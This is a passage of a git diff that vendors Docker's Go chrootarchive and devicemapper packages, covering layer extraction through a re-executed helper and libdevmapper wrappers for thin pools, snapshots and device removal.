+		fatal(err)
+	}
+
+	// We need to be able to set any perms
+	oldmask, err := system.Umask(0)
+	defer system.Umask(oldmask)
+	if err != nil {
+		fatal(err)
+	}
+
+	if err := json.Unmarshal([]byte(os.Getenv("OPT")), &options); err != nil {
+		fatal(err)
+	}
+
+	if inUserns {
+		options.InUserNS = true
+	}
+
+	if tmpDir, err = ioutil.TempDir("/", "temp-docker-extract"); err != nil {
+		fatal(err)
+	}
+
+	os.Setenv("TMPDIR", tmpDir)
+	size, err := archive.UnpackLayer("/", os.Stdin, options)
+	os.RemoveAll(tmpDir)
+	if err != nil {
+		fatal(err)
+	}
+
+	encoder := json.NewEncoder(os.Stdout)
+	if err := encoder.Encode(applyLayerResponse{size}); err != nil {
+		fatal(fmt.Errorf("unable to encode layerSize JSON: %s", err))
+	}
+
+	if _, err := flush(os.Stdin); err != nil {
+		fatal(err)
+	}
+
+	os.Exit(0)
+}
+
+// applyLayerHandler parses a diff in the standard layer format from `layer`, and
+// applies it to the directory `dest`. Returns the size in bytes of the
+// contents of the layer.
+func applyLayerHandler(dest string, layer io.Reader, options *archive.TarOptions, decompress bool) (size int64, err error) {
+	dest = filepath.Clean(dest)
+	if decompress {
+		decompressed, err := archive.DecompressStream(layer)
+		if err != nil {
+			return 0, err
+		}
+		defer decompressed.Close()
+
+		layer = decompressed
+	}
+	if options == nil {
+		options = &archive.TarOptions{}
+		if rsystem.RunningInUserNS() {
+			options.InUserNS = true
+		}
+	}
+	if options.ExcludePatterns == nil {
+		options.ExcludePatterns = []string{}
+	}
+
+	data, err := json.Marshal(options)
+	if err != nil {
+		return 0, fmt.Errorf("ApplyLayer json encode: %v", err)
+	}
+
+	cmd := reexec.Command("docker-applyLayer", dest)
+	cmd.Stdin = layer
+	cmd.Env = append(cmd.Env, fmt.Sprintf("OPT=%s", data))
+
+	outBuf, errBuf := new(bytes.Buffer), new(bytes.Buffer)
+	cmd.Stdout, cmd.Stderr = outBuf, errBuf
+
+	if err = cmd.Run(); err != nil {
+		return 0, fmt.Errorf("ApplyLayer %s stdout: %s stderr: %s", err, outBuf, errBuf)
+	}
+
+	// Stdout should be a valid JSON struct representing an applyLayerResponse.
+	response := applyLayerResponse{}
+	decoder := json.NewDecoder(outBuf)
+	if err = decoder.Decode(&response); err != nil {
+		return 0, fmt.Errorf("unable to decode ApplyLayer JSON response: %s", err)
+	}
+
+	return response.LayerSize, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go
new file mode 100644
index 0000000000..9dd9988de0
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go
@@ -0,0 +1,45 @@
+package chrootarchive
+
+import (
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/longpath"
+)
+
+// applyLayerHandler parses a diff in the standard layer format from `layer`, and
+// applies it to the directory `dest`. Returns the size in bytes of the
+// contents of the layer.
+func applyLayerHandler(dest string, layer io.Reader, options *archive.TarOptions, decompress bool) (size int64, err error) {
+	dest = filepath.Clean(dest)
+
+	// Ensure it is a Windows-style volume path
+	dest = longpath.AddPrefix(dest)
+
+	if decompress {
+		decompressed, err := archive.DecompressStream(layer)
+		if err != nil {
+			return 0, err
+		}
+		defer decompressed.Close()
+
+		layer = decompressed
+	}
+
+	tmpDir, err := ioutil.TempDir(os.Getenv("temp"), "temp-docker-extract")
+	if err != nil {
+		return 0, fmt.Errorf("ApplyLayer failed to create temp-docker-extract under %s. %s", dest, err)
+	}
+
+	s, err := archive.UnpackLayer(dest, layer, nil)
+	os.RemoveAll(tmpDir)
+	if err != nil {
+		return 0, fmt.Errorf("ApplyLayer %s failed UnpackLayer to %s", err, dest)
+	}
+
+	return s, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go
new file mode 100644
index 0000000000..4f637f17b8
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go
@@ -0,0 +1,28 @@
+// +build !windows
+
+package chrootarchive
+
+import (
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+
+	"github.com/docker/docker/pkg/reexec"
+)
+
+func init() {
+	reexec.Register("docker-applyLayer", applyLayer)
+	reexec.Register("docker-untar", untar)
+}
+
+func fatal(err error) {
+	fmt.Fprint(os.Stderr, err)
+	os.Exit(1)
+}
+
+// flush consumes all the bytes from the reader discarding
+// any errors
+func flush(r io.Reader) (bytes int64, err error) {
+	return io.Copy(ioutil.Discard, r)
+}
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go
new file mode 100644
index 0000000000..fa17c9bf83
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go
@@ -0,0 +1,4 @@
+package chrootarchive
+
+func init() {
+}
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go
new file mode 100644
index 0000000000..94b55306f1
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go
@@ -0,0 +1,828 @@
+// +build linux
+
+package devicemapper
+
+import (
+	"errors"
+	"fmt"
+	"os"
+	"runtime"
+	"syscall"
+	"unsafe"
+
+	"github.com/Sirupsen/logrus"
+)
+
+// DevmapperLogger defines methods for logging with devicemapper.
+type DevmapperLogger interface {
+	DMLog(level int, file string, line int, dmError int, message string)
+}
+
+const (
+	deviceCreate TaskType = iota
+	deviceReload
+	deviceRemove
+	deviceRemoveAll
+	deviceSuspend
+	deviceResume
+	deviceInfo
+	deviceDeps
+	deviceRename
+	deviceVersion
+	deviceStatus
+	deviceTable
+	deviceWaitevent
+	deviceList
+	deviceClear
+	deviceMknodes
+	deviceListVersions
+	deviceTargetMsg
+	deviceSetGeometry
+)
+
+const (
+	addNodeOnResume AddNodeType = iota
+	addNodeOnCreate
+)
+
+// List of errors returned when using devicemapper.
+var (
+	ErrTaskRun              = errors.New("dm_task_run failed")
+	ErrTaskSetName          = errors.New("dm_task_set_name failed")
+	ErrTaskSetMessage       = errors.New("dm_task_set_message failed")
+	ErrTaskSetAddNode       = errors.New("dm_task_set_add_node failed")
+	ErrTaskSetRo            = errors.New("dm_task_set_ro failed")
+	ErrTaskAddTarget        = errors.New("dm_task_add_target failed")
+	ErrTaskSetSector        = errors.New("dm_task_set_sector failed")
+	ErrTaskGetDeps          = errors.New("dm_task_get_deps failed")
+	ErrTaskGetInfo          = errors.New("dm_task_get_info failed")
+	ErrTaskGetDriverVersion = errors.New("dm_task_get_driver_version failed")
+	ErrTaskDeferredRemove   = errors.New("dm_task_deferred_remove failed")
+	ErrTaskSetCookie        = errors.New("dm_task_set_cookie failed")
+	ErrNilCookie            = errors.New("cookie ptr can't be nil")
+	ErrGetBlockSize         = errors.New("Can't get block size")
+	ErrUdevWait             = errors.New("wait on udev cookie failed")
+	ErrSetDevDir            = errors.New("dm_set_dev_dir failed")
+	ErrGetLibraryVersion    = errors.New("dm_get_library_version failed")
+	ErrCreateRemoveTask     = errors.New("Can't create task of type deviceRemove")
+	ErrRunRemoveDevice      = errors.New("running RemoveDevice failed")
+	ErrInvalidAddNode       = errors.New("Invalid AddNode type")
+	ErrBusy                 = errors.New("Device is Busy")
+	ErrDeviceIDExists       = errors.New("Device Id Exists")
+	ErrEnxio                = errors.New("No such device or address")
+)
+
+var (
+	dmSawBusy  bool
+	dmSawExist bool
+	dmSawEnxio bool // No Such Device or Address
+)
+
+type (
+	// Task represents a devicemapper task (like lvcreate, etc.) ; a task is needed for each ioctl
+	// command to execute.
+	Task struct {
+		unmanaged *cdmTask
+	}
+	// Deps represents dependents (layer) of a device.
+	Deps struct {
+		Count  uint32
+		Filler uint32
+		Device []uint64
+	}
+	// Info represents information about a device.
+	Info struct {
+		Exists         int
+		Suspended      int
+		LiveTable      int
+		InactiveTable  int
+		OpenCount      int32
+		EventNr        uint32
+		Major          uint32
+		Minor          uint32
+		ReadOnly       int
+		TargetCount    int32
+		DeferredRemove int
+	}
+	// TaskType represents a type of task
+	TaskType int
+	// AddNodeType represents a type of node to be added
+	AddNodeType int
+)
+
+// DeviceIDExists returns whether error conveys the information about device Id already
+// exist or not. This will be true if device creation or snap creation
+// operation fails if device or snap device already exists in pool.
+// Current implementation is little crude as it scans the error string
+// for exact pattern match. Replacing it with more robust implementation
+// is desirable.
+func DeviceIDExists(err error) bool {
+	return fmt.Sprint(err) == fmt.Sprint(ErrDeviceIDExists)
+}
+
+func (t *Task) destroy() {
+	if t != nil {
+		DmTaskDestroy(t.unmanaged)
+		runtime.SetFinalizer(t, nil)
+	}
+}
+
+// TaskCreateNamed is a convenience function for TaskCreate when a name
+// will be set on the task as well
+func TaskCreateNamed(t TaskType, name string) (*Task, error) {
+	task := TaskCreate(t)
+	if task == nil {
+		return nil, fmt.Errorf("devicemapper: Can't create task of type %d", int(t))
+	}
+	if err := task.setName(name); err != nil {
+		return nil, fmt.Errorf("devicemapper: Can't set task name %s", name)
+	}
+	return task, nil
+}
+
+// TaskCreate initializes a devicemapper task of tasktype
+func TaskCreate(tasktype TaskType) *Task {
+	Ctask := DmTaskCreate(int(tasktype))
+	if Ctask == nil {
+		return nil
+	}
+	task := &Task{unmanaged: Ctask}
+	runtime.SetFinalizer(task, (*Task).destroy)
+	return task
+}
+
+func (t *Task) run() error {
+	if res := DmTaskRun(t.unmanaged); res != 1 {
+		return ErrTaskRun
+	}
+	return nil
+}
+
+func (t *Task) setName(name string) error {
+	if res := DmTaskSetName(t.unmanaged, name); res != 1 {
+		return ErrTaskSetName
+	}
+	return nil
+}
+
+func (t *Task) setMessage(message string) error {
+	if res := DmTaskSetMessage(t.unmanaged, message); res != 1 {
+		return ErrTaskSetMessage
+	}
+	return nil
+}
+
+func (t *Task) setSector(sector uint64) error {
+	if res := DmTaskSetSector(t.unmanaged, sector); res != 1 {
+		return ErrTaskSetSector
+	}
+	return nil
+}
+
+func (t *Task) setCookie(cookie *uint, flags uint16) error {
+	if cookie == nil {
+		return ErrNilCookie
+	}
+	if res := DmTaskSetCookie(t.unmanaged, cookie, flags); res != 1 {
+		return ErrTaskSetCookie
+	}
+	return nil
+}
+
+func (t *Task) setAddNode(addNode AddNodeType) error {
+	if addNode != addNodeOnResume && addNode != addNodeOnCreate {
+		return ErrInvalidAddNode
+	}
+	if res := DmTaskSetAddNode(t.unmanaged, addNode); res != 1 {
+		return ErrTaskSetAddNode
+	}
+	return nil
+}
+
+func (t *Task) setRo() error {
+	if res := DmTaskSetRo(t.unmanaged); res != 1 {
+		return ErrTaskSetRo
+	}
+	return nil
+}
+
+func (t *Task) addTarget(start, size uint64, ttype, params string) error {
+	if res := DmTaskAddTarget(t.unmanaged, start, size,
+		ttype, params); res != 1 {
+		return ErrTaskAddTarget
+	}
+	return nil
+}
+
+func (t *Task) getDeps() (*Deps, error) {
+	var deps *Deps
+	if deps = DmTaskGetDeps(t.unmanaged); deps == nil {
+		return nil, ErrTaskGetDeps
+	}
+	return deps, nil
+}
+
+func (t *Task) getInfo() (*Info, error) {
+	info := &Info{}
+	if res := DmTaskGetInfo(t.unmanaged, info); res != 1 {
+		return nil, ErrTaskGetInfo
+	}
+	return info, nil
+}
+
+func (t *Task) getInfoWithDeferred() (*Info, error) {
+	info := &Info{}
+	if res := DmTaskGetInfoWithDeferred(t.unmanaged, info); res != 1 {
+		return nil, ErrTaskGetInfo
+	}
+	return info, nil
+}
+
+func (t *Task) getDriverVersion() (string, error) {
+	res := DmTaskGetDriverVersion(t.unmanaged)
+	if res == "" {
+		return "", ErrTaskGetDriverVersion
+	}
+	return res, nil
+}
+
+func (t *Task) getNextTarget(next unsafe.Pointer) (nextPtr unsafe.Pointer, start uint64,
+	length uint64, targetType string, params string) {
+
+	return DmGetNextTarget(t.unmanaged, next, &start, &length,
+			&targetType, &params),
+		start, length, targetType, params
+}
+
+// UdevWait waits for any processes that are waiting for udev to complete the specified cookie.
+func UdevWait(cookie *uint) error {
+	if res := DmUdevWait(*cookie); res != 1 {
+		logrus.Debugf("devicemapper: Failed to wait on udev cookie %d", *cookie)
+		return ErrUdevWait
+	}
+	return nil
+}
+
+// LogInitVerbose is an interface to initialize the verbose logger for the device mapper library.
+func LogInitVerbose(level int) {
+	DmLogInitVerbose(level)
+}
+
+var dmLogger DevmapperLogger
+
+// LogInit initializes the logger for the device mapper library.
+func LogInit(logger DevmapperLogger) {
+	dmLogger = logger
+	LogWithErrnoInit()
+}
+
+// SetDevDir sets the dev folder for the device mapper library (usually /dev).
+func SetDevDir(dir string) error {
+	if res := DmSetDevDir(dir); res != 1 {
+		logrus.Debug("devicemapper: Error dm_set_dev_dir")
+		return ErrSetDevDir
+	}
+	return nil
+}
+
+// GetLibraryVersion returns the device mapper library version.
+func GetLibraryVersion() (string, error) {
+	var version string
+	if res := DmGetLibraryVersion(&version); res != 1 {
+		return "", ErrGetLibraryVersion
+	}
+	return version, nil
+}
+
+// UdevSyncSupported returns whether device-mapper is able to sync with udev
+//
+// This is essential otherwise race conditions can arise where both udev and
+// device-mapper attempt to create and destroy devices.
+func UdevSyncSupported() bool {
+	return DmUdevGetSyncSupport() != 0
+}
+
+// UdevSetSyncSupport allows setting whether the udev sync should be enabled.
+// The return bool indicates the state of whether the sync is enabled.
+func UdevSetSyncSupport(enable bool) bool {
+	if enable {
+		DmUdevSetSyncSupport(1)
+	} else {
+		DmUdevSetSyncSupport(0)
+	}
+
+	return UdevSyncSupported()
+}
+
+// CookieSupported returns whether the version of device-mapper supports the
+// use of cookie's in the tasks.
+// This is largely a lower level call that other functions use.
+func CookieSupported() bool {
+	return DmCookieSupported() != 0
+}
+
+// RemoveDevice is a useful helper for cleaning up a device.
+func RemoveDevice(name string) error {
+	task, err := TaskCreateNamed(deviceRemove, name)
+	if task == nil {
+		return err
+	}
+
+	var cookie uint
+	if err := task.setCookie(&cookie, 0); err != nil {
+		return fmt.Errorf("devicemapper: Can not set cookie: %s", err)
+	}
+	defer UdevWait(&cookie)
+
+	dmSawBusy = false // reset before the task is run
+	if err = task.run(); err != nil {
+		if dmSawBusy {
+			return ErrBusy
+		}
+		return fmt.Errorf("devicemapper: Error running RemoveDevice %s", err)
+	}
+
+	return nil
+}
+
+// RemoveDeviceDeferred is a useful helper for cleaning up a device, but deferred.
+func RemoveDeviceDeferred(name string) error {
+	logrus.Debugf("devicemapper: RemoveDeviceDeferred START(%s)", name)
+	defer logrus.Debugf("devicemapper: RemoveDeviceDeferred END(%s)", name)
+	task, err := TaskCreateNamed(deviceRemove, name)
+	if task == nil {
+		return err
+	}
+
+	if err := DmTaskDeferredRemove(task.unmanaged); err != 1 {
+		return ErrTaskDeferredRemove
+	}
+
+	// set a task cookie and disable library fallback, or else libdevmapper will
+	// disable udev dm rules and delete the symlink under /dev/mapper by itself,
+	// even if the removal is deferred by the kernel.
+	var cookie uint
+	var flags uint16
+	flags = DmUdevDisableLibraryFallback
+	if err := task.setCookie(&cookie, flags); err != nil {
+		return fmt.Errorf("devicemapper: Can not set cookie: %s", err)
+	}
+
+	// libdevmapper and udev relies on System V semaphore for synchronization,
+	// semaphores created in `task.setCookie` will be cleaned up in `UdevWait`.
+	// So these two function call must come in pairs, otherwise semaphores will
+	// be leaked, and the  limit of number of semaphores defined in `/proc/sys/kernel/sem`
+	// will be reached, which will eventually make all follwing calls to 'task.SetCookie'
+	// fail.
+	// this call will not wait for the deferred removal's final executing, since no
+	// udev event will be generated, and the semaphore's value will not be incremented
+	// by udev, what UdevWait is just cleaning up the semaphore.
+	defer UdevWait(&cookie)
+
+	if err = task.run(); err != nil {
+		return fmt.Errorf("devicemapper: Error running RemoveDeviceDeferred %s", err)
+	}
+
+	return nil
+}
+
+// CancelDeferredRemove cancels a deferred remove for a device.
+func CancelDeferredRemove(deviceName string) error {
+	task, err := TaskCreateNamed(deviceTargetMsg, deviceName)
+	if task == nil {
+		return err
+	}
+
+	if err := task.setSector(0); err != nil {
+		return fmt.Errorf("devicemapper: Can't set sector %s", err)
+	}
+
+	if err := task.setMessage(fmt.Sprintf("@cancel_deferred_remove")); err != nil {
+		return fmt.Errorf("devicemapper: Can't set message %s", err)
+	}
+
+	dmSawBusy = false
+	dmSawEnxio = false
+	if err := task.run(); err != nil {
+		// A device might be being deleted already
+		if dmSawBusy {
+			return ErrBusy
+		} else if dmSawEnxio {
+			return ErrEnxio
+		}
+		return fmt.Errorf("devicemapper: Error running CancelDeferredRemove %s", err)
+
+	}
+	return nil
+}
+
+// GetBlockDeviceSize returns the size of a block device identified by the specified file.
+func GetBlockDeviceSize(file *os.File) (uint64, error) {
+	size, err := ioctlBlkGetSize64(file.Fd())
+	if err != nil {
+		logrus.Errorf("devicemapper: Error getblockdevicesize: %s", err)
+		return 0, ErrGetBlockSize
+	}
+	return uint64(size), nil
+}
+
+// BlockDeviceDiscard runs discard for the given path.
+// This is used as a workaround for the kernel not discarding block so
+// on the thin pool when we remove a thinp device, so we do it
+// manually
+func BlockDeviceDiscard(path string) error {
+	file, err := os.OpenFile(path, os.O_RDWR, 0)
+	if err != nil {
+		return err
+	}
+	defer file.Close()
+
+	size, err := GetBlockDeviceSize(file)
+	if err != nil {
+		return err
+	}
+
+	if err := ioctlBlkDiscard(file.Fd(), 0, size); err != nil {
+		return err
+	}
+
+	// Without this sometimes the remove of the device that happens after
+	// discard fails with EBUSY.
+	syscall.Sync()
+
+	return nil
+}
+
+// CreatePool is the programmatic example of "dmsetup create".
+// It creates a device with the specified poolName, data and metadata file and block size.
+func CreatePool(poolName string, dataFile, metadataFile *os.File, poolBlockSize uint32) error {
+	task, err := TaskCreateNamed(deviceCreate, poolName)
+	if task == nil {
+		return err
+	}
+
+	size, err := GetBlockDeviceSize(dataFile)
+	if err != nil {
+		return fmt.Errorf("devicemapper: Can't get data size %s", err)
+	}
+
+	params := fmt.Sprintf("%s %s %d 32768 1 skip_block_zeroing", metadataFile.Name(), dataFile.Name(), poolBlockSize)
+	if err := task.addTarget(0, size/512, "thin-pool", params); err != nil {
+		return fmt.Errorf("devicemapper: Can't add target %s", err)
+	}
+
+	var cookie uint
+	var flags uint16
+	flags = DmUdevDisableSubsystemRulesFlag | DmUdevDisableDiskRulesFlag | DmUdevDisableOtherRulesFlag
+	if err := task.setCookie(&cookie, flags); err != nil {
+		return fmt.Errorf("devicemapper: Can't set cookie %s", err)
+	}
+	defer UdevWait(&cookie)
+
+	if err := task.run(); err != nil {
+		return fmt.Errorf("devicemapper: Error running deviceCreate (CreatePool) %s", err)
+	}
+
+	return nil
+}
+
+// ReloadPool is the programmatic example of "dmsetup reload".
+// It reloads the table with the specified poolName, data and metadata file and block size.
+func ReloadPool(poolName string, dataFile, metadataFile *os.File, poolBlockSize uint32) error {
+	task, err := TaskCreateNamed(deviceReload, poolName)
+	if task == nil {
+		return err
+	}
+
+	size, err := GetBlockDeviceSize(dataFile)
+	if err != nil {
+		return fmt.Errorf("devicemapper: Can't get data size %s", err)
+	}
+
+	params := fmt.Sprintf("%s %s %d 32768 1 skip_block_zeroing", metadataFile.Name(), dataFile.Name(), poolBlockSize)
+	if err := task.addTarget(0, size/512, "thin-pool", params); err != nil {
+		return fmt.Errorf("devicemapper: Can't add target %s", err)
+	}
+
+	if err := task.run(); err != nil {
+		return fmt.Errorf("devicemapper: Error running deviceCreate %s", err)
+	}
+
+	return nil
+}
+
+// GetDeps is the programmatic example of "dmsetup deps".
+// It outputs a list of devices referenced by the live table for the specified device.
+func GetDeps(name string) (*Deps, error) {
+	task, err := TaskCreateNamed(deviceDeps, name)
+	if task == nil {
+		return nil, err
+	}
+	if err := task.run(); err != nil {
+		return nil, err
+	}
+	return task.getDeps()
+}
+
+// GetInfo is the programmatic example of "dmsetup info".
+// It outputs some brief information about the device.
+func GetInfo(name string) (*Info, error) {
+	task, err := TaskCreateNamed(deviceInfo, name)
+	if task == nil {
+		return nil, err
+	}
+	if err := task.run(); err != nil {
+		return nil, err
+	}
+	return task.getInfo()
+}
+
+// GetInfoWithDeferred is the programmatic example of "dmsetup info", but deferred.
+// It outputs some brief information about the device.
+func GetInfoWithDeferred(name string) (*Info, error) {
+	task, err := TaskCreateNamed(deviceInfo, name)
+	if task == nil {
+		return nil, err
+	}
+	if err := task.run(); err != nil {
+		return nil, err
+	}
+	return task.getInfoWithDeferred()
+}
+
+// GetDriverVersion is the programmatic example of "dmsetup version".
+// It outputs version information of the driver.
+func GetDriverVersion() (string, error) {
+	task := TaskCreate(deviceVersion)
+	if task == nil {
+		return "", fmt.Errorf("devicemapper: Can't create deviceVersion task")
+	}
+	if err := task.run(); err != nil {
+		return "", err
+	}
+	return task.getDriverVersion()
+}
+
+// GetStatus is the programmatic example of "dmsetup status".
+// It outputs status information for the specified device name.
+func GetStatus(name string) (uint64, uint64, string, string, error) {
+	task, err := TaskCreateNamed(deviceStatus, name)
+	if task == nil {
+		logrus.Debugf("devicemapper: GetStatus() Error TaskCreateNamed: %s", err)
+		return 0, 0, "", "", err
+	}
+	if err := task.run(); err != nil {
+		logrus.Debugf("devicemapper: GetStatus() Error Run: %s", err)
+		return 0, 0, "", "", err
+	}
+
+	devinfo, err := task.getInfo()
+	if err != nil {
+		logrus.Debugf("devicemapper: GetStatus() Error GetInfo: %s", err)
+		return 0, 0, "", "", err
+	}
+	if devinfo.Exists == 0 {
+		logrus.Debugf("devicemapper: GetStatus() Non existing device %s", name)
+		return 0, 0, "", "", fmt.Errorf("devicemapper: Non existing device %s", name)
+	}
+
+	_, start, length, targetType, params := task.getNextTarget(unsafe.Pointer(nil))
+	return start, length, targetType, params, nil
+}
+
+// GetTable is the programmatic example for "dmsetup table".
+// It outputs the current table for the specified device name.
+func GetTable(name string) (uint64, uint64, string, string, error) {
+	task, err := TaskCreateNamed(deviceTable, name)
+	if task == nil {
+		logrus.Debugf("devicemapper: GetTable() Error TaskCreateNamed: %s", err)
+		return 0, 0, "", "", err
+	}
+	if err := task.run(); err != nil {
+		logrus.Debugf("devicemapper: GetTable() Error Run: %s", err)
+		return 0, 0, "", "", err
+	}
+
+	devinfo, err := task.getInfo()
+	if err != nil {
+		logrus.Debugf("devicemapper: GetTable() Error GetInfo: %s", err)
+		return 0, 0, "", "", err
+	}
+	if devinfo.Exists == 0 {
+		logrus.Debugf("devicemapper: GetTable() Non existing device %s", name)
+		return 0, 0, "", "", fmt.Errorf("devicemapper: Non existing device %s", name)
+	}
+
+	_, start, length, targetType, params := task.getNextTarget(unsafe.Pointer(nil))
+	return start, length, targetType, params, nil
+}
+
+// SetTransactionID sets a transaction id for the specified device name.
+func SetTransactionID(poolName string, oldID uint64, newID uint64) error {
+	task, err := TaskCreateNamed(deviceTargetMsg, poolName)
+	if task == nil {
+		return err
+	}
+
+	if err := task.setSector(0); err != nil {
+		return fmt.Errorf("devicemapper: Can't set sector %s", err)
+	}
+
+	if err := task.setMessage(fmt.Sprintf("set_transaction_id %d %d", oldID, newID)); err != nil {
+		return fmt.Errorf("devicemapper: Can't set message %s", err)
+	}
+
+	if err := task.run(); err != nil {
+		return fmt.Errorf("devicemapper: Error running SetTransactionID %s", err)
+	}
+	return nil
+}
+
+// SuspendDevice is the programmatic example of "dmsetup suspend".
+// It suspends the specified device.
+func SuspendDevice(name string) error {
+	task, err := TaskCreateNamed(deviceSuspend, name)
+	if task == nil {
+		return err
+	}
+	if err := task.run(); err != nil {
+		return fmt.Errorf("devicemapper: Error running deviceSuspend %s", err)
+	}
+	return nil
+}
+
+// ResumeDevice is the programmatic example of "dmsetup resume".
+// It un-suspends the specified device.
+func ResumeDevice(name string) error {
+	task, err := TaskCreateNamed(deviceResume, name)
+	if task == nil {
+		return err
+	}
+
+	var cookie uint
+	if err := task.setCookie(&cookie, 0); err != nil {
+		return fmt.Errorf("devicemapper: Can't set cookie %s", err)
+	}
+	defer UdevWait(&cookie)
+
+	if err := task.run(); err != nil {
+		return fmt.Errorf("devicemapper: Error running deviceResume %s", err)
+	}
+
+	return nil
+}
+
+// CreateDevice creates a device with the specified poolName with the specified device id.
+func CreateDevice(poolName string, deviceID int) error {
+	logrus.Debugf("devicemapper: CreateDevice(poolName=%v, deviceID=%v)", poolName, deviceID)
+	task, err := TaskCreateNamed(deviceTargetMsg, poolName)
+	if task == nil {
+		return err
+	}
+
+	if err := task.setSector(0); err != nil {
+		return fmt.Errorf("devicemapper: Can't set sector %s", err)
+	}
+
+	if err := task.setMessage(fmt.Sprintf("create_thin %d", deviceID)); err != nil {
+		return fmt.Errorf("devicemapper: Can't set message %s", err)
+	}
+
+	dmSawExist = false // reset before the task is run
+	if err := task.run(); err != nil {
+		// Caller wants to know about ErrDeviceIDExists so that it can try with a different device id.
+		if dmSawExist {
+			return ErrDeviceIDExists
+		}
+
+		return fmt.Errorf("devicemapper: Error running CreateDevice %s", err)
+
+	}
+	return nil
+}
+
+// DeleteDevice deletes a device with the specified poolName with the specified device id.
+func DeleteDevice(poolName string, deviceID int) error {
+	task, err := TaskCreateNamed(deviceTargetMsg, poolName)
+	if task == nil {
+		return err
+	}
+
+	if err := task.setSector(0); err != nil {
+		return fmt.Errorf("devicemapper: Can't set sector %s", err)
+	}
+
+	if err := task.setMessage(fmt.Sprintf("delete %d", deviceID)); err != nil {
+		return fmt.Errorf("devicemapper: Can't set message %s", err)
+	}
+
+	dmSawBusy = false
+	if err := task.run(); err != nil {
+		if dmSawBusy {
+			return ErrBusy
+		}
+		return fmt.Errorf("devicemapper: Error running DeleteDevice %s", err)
+	}
+	return nil
+}
+
+// ActivateDevice activates the device identified by the specified
+// poolName, name and deviceID with the specified size.
+func ActivateDevice(poolName string, name string, deviceID int, size uint64) error {
+	return activateDevice(poolName, name, deviceID, size, "")
+}
+
+// ActivateDeviceWithExternal activates the device identified by the specified
+// poolName, name and deviceID with the specified size.
+func ActivateDeviceWithExternal(poolName string, name string, deviceID int, size uint64, external string) error {
+	return activateDevice(poolName, name, deviceID, size, external)
+}
+
+func activateDevice(poolName string, name string, deviceID int, size uint64, external string) error {
+	task, err := TaskCreateNamed(deviceCreate, name)
+	if task == nil {
+		return err
+	}
+
+	var params string
+	if len(external) > 0 {
+		params = fmt.Sprintf("%s %d %s", poolName, deviceID, external)
+	} else {
+		params = fmt.Sprintf("%s %d", poolName, deviceID)
+	}
+	if err := task.addTarget(0, size/512, "thin", params); err != nil {
+		return fmt.Errorf("devicemapper: Can't add target %s", err)
+	}
+	if err := task.setAddNode(addNodeOnCreate); err != nil {
+		return fmt.Errorf("devicemapper: Can't add node %s", err)
+	}
+
+	var cookie uint
+	if err := task.setCookie(&cookie, 0); err != nil {
+		return fmt.Errorf("devicemapper: Can't set cookie %s", err)
+	}
+
+	defer UdevWait(&cookie)
+
+	if err := task.run(); err != nil {
+		return fmt.Errorf("devicemapper: Error running deviceCreate (ActivateDevice) %s", err)
+	}
+
+	return nil
+}
+
+// CreateSnapDeviceRaw creates a snapshot device. Caller needs to suspend and resume the origin device if it is active.
+func CreateSnapDeviceRaw(poolName string, deviceID int, baseDeviceID int) error {
+	task, err := TaskCreateNamed(deviceTargetMsg, poolName)
+	if task == nil {
+		return err
+	}
+
+	if err := task.setSector(0); err != nil {
+		return fmt.Errorf("devicemapper: Can't set sector %s", err)
+	}
+
+	if err := task.setMessage(fmt.Sprintf("create_snap %d %d", deviceID, baseDeviceID)); err != nil {
+		return fmt.Errorf("devicemapper: Can't set message %s", err)
+	}
+
+	dmSawExist = false // reset before the task is run
+	if err := task.run(); err != nil {
+		// Caller wants to know about ErrDeviceIDExists so that it can try with a different device id.
+		if dmSawExist {
+			return ErrDeviceIDExists
+		}
+		return fmt.Errorf("devicemapper: Error running deviceCreate (createSnapDevice) %s", err)
+	}
+
+	return nil
+}
+
+// CreateSnapDevice creates a snapshot based on the device identified by the baseName and baseDeviceId,
+func CreateSnapDevice(poolName string, deviceID int, baseName string, baseDeviceID int) error {
+	devinfo, _ := GetInfo(baseName)
+	doSuspend := devinfo != nil && devinfo.Exists != 0
+
+	if doSuspend {
+		if err := SuspendDevice(baseName); err != nil {
+			return err
+		}
+	}
+
+	if err := CreateSnapDeviceRaw(poolName, deviceID, baseDeviceID); err != nil {
+		if doSuspend {
+			if err2 := ResumeDevice(baseName); err2 != nil {
+				return fmt.Errorf("CreateSnapDeviceRaw Error: (%v): ResumeDevice Error: (%v)", err, err2)
+			}
+		}
+		return err
+	}
+
+	if doSuspend {
+		if err := ResumeDevice(baseName); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go
new file mode 100644
index 0000000000..8477e36fec
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go
@@ -0,0 +1,35 @@
+// +build linux
+
+package devicemapper
+
+import "C"
+
+import (
+	"strings"
+)
+
+// Due to the way cgo works this has to be in a separate file, as devmapper.go has
+// definitions in the cgo block, which is incompatible with using "//export"
+
+// DevmapperLogCallback exports the devmapper log callback for cgo.
+//export DevmapperLogCallback
+func DevmapperLogCallback(level C.int, file *C.char, line C.int, dmErrnoOrClass C.int, message *C.char) {
+	msg := C.GoString(message)
+	if level < 7 {
+		if strings.Contains(msg, "busy") {
+			dmSawBusy = true
+		}
+
+		if strings.Contains(msg, "File exists") {
+			dmSawExist = true
+		}
+
+		if strings.Contains(msg, "No such device or address") {
+			dmSawEnxio = true
+		}
+	}
+
+	if dmLogger != nil {
